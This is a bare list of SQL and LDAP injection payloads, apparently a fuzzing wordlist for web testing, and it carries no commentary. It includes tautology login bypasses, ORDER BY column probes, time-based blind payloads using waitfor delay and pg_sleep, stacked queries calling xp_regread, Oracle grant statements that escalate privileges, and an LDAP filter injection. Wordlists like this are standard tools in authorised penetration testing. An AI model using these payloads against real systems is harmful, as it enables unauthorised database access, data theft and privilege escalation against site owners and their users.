'
/
<>"'%;)(&+
*/*
&
' or "
 or 1=1 or ''='
' or 1=1--
’ or ‘1’=’1
' or '1'='1
' or 1=1
' or 1=1 /*
a' or 1=1--
a' or 'a' = 'a
; or '1'='1'
"hi"") or (""a""=""a"
hi or 1=1 --"
' AND id IS NULL; --
1' ORDER BY 1--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
)%20or%20('x'='x
%20or%201=1
')%20or%20('x'='x
'%20or%20''='
'%20or%201=1
; execute immediate 'sel' || 'ect us' || 'er'
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
hi"""") or (""""a""""=""""a"""
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
 or 0=0 #
) or ('a'='a
; exec xp_regread
*|
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
; --
'; --
'); --
' grant connect to name; grant resource to name; --
